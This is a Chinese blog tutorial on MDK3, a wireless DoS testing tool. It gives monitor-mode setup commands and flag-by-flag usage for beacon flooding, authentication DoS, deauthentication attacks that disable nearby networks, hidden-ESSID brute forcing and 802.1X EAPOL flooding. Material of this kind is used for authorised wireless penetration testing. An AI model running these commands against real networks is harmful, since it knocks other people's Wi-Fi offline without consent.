最新文章:

首页 Linux

MDK3

发布时间:2018年08月02日 评论数:抢沙发 阅读数:229

    “ MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。
         ——虽然这几句话被转了N遍,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:

    首先激活无线网卡至监听模式:

    ifconfig -a #记住无线网卡名

    airmon-ng start wlan0

    (可以搜索攻击目标airodump-ng mon0)

    然后输入mdk3 --fullhelp查看详细帮助内容


    beacon flood mode:
         这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
    详细命令如下:
    mdk3 mon0 b
          -n         #自定义ESSID
          -f             #读取ESSID列表文件
          -v            #自定义ESSID和BSSID对应列表文件
          -d         #自定义为Ad-Hoc模式
          -w         #自定义为wep模式
          -g           #54Mbit模式
          -t            # WPA TKIP encryption
          -a           #WPA AES encryption
          -m          #读取数据库的mac地址
           -c                    #自定义信道
           -s                 #发包速率
    mdk3 --help b  #查看详细内容


    Authentication DoS:
    这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!
    mdk3 mon0 a
          -a               #测试指定BSSID
          -m              #使用有效数据库中的客户端mac地址
          -c          #对应 -a ,不检查是否测试成功
          -i             #对指定BSSID进行智能攻击
          -s                #速率,默认50


    Deauthentication/Disassociation Amok
    这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
    mdk3 mon0 d
          -w              #白名单mac地址列表文件
          -b               #黑名单mac地址列表文件
          -s                         #速率,这个模式下默认无限制
          -c [chan,chan,chan,...]                  #信道,可以多填,如 2,4,5,1


    Basic probing and ESSID Bruteforce mode
    :
    基本探测AP信息和ESSID猜解模式
    mdk3 mon0 p
          -e           #待检测的ssid
          -f           #检测AP设置为隐藏的ssid列表文件
          -t                #用bssid检测AP的信息
          -s                 #速率,默认300
          -b               #设置字符集


    802.1X tests
    802.1X 协议下的攻击测试
    mdk3 mon0 x  
          0 - EAPOL Start packet flooding   #EAPOL格式的报文洪水攻击
                -n               
                -t         #目标客户端的mac地址               
                -w
                   Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
                -u
                   Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
                -m
                   Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
                -s       #速率,默认400               
          1 - EAPOL Logoff test       #注销认证攻击
                -t         #目标客户端的mac地址            
                -c          #目标ap的合法客户端mac               
                -s          #速率,默认400               

    3233584532552401120.png (212.56 KB, 下载次数: 0)

    下载附件  保存到相册

    2014-4-8 22:34 上传


二维码加载中...
本文作者:HDC      文章标题: MDK3
本文地址:http://hdcin.cn/?post=299
版权声明:若无注明,本文皆为“小胖Blog's”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论